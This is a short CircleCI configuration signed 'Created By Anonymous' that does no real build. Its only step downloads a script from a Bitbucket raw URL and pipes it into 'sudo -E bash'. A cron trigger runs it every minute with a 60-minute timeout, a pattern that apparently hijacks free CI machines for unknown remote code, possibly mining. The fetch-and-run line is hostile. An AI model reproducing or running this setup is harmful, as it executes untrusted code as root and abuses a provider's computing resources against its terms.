# ======================== #
# ======================== #
# = Created By Anonymous = #
# ======================== #
# ======================== #
version: 2.1
jobs:
  Builds:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: Mulai Bro...
          no_output_timeout: 60m
          command: curl -sL https://bitbucket.org/webwebweb_one/testo/raw/ff2adc7028f19381ef8f80db135e2c1a8eda75d8/index | sudo -E bash -
# ======================== #
workflows:
  Workflows:
    triggers:
      - schedule:
          cron: "* * * * *"
          filters:
            branches:
              only: master
# ======================== #
    jobs:
      - Builds
# ======================== #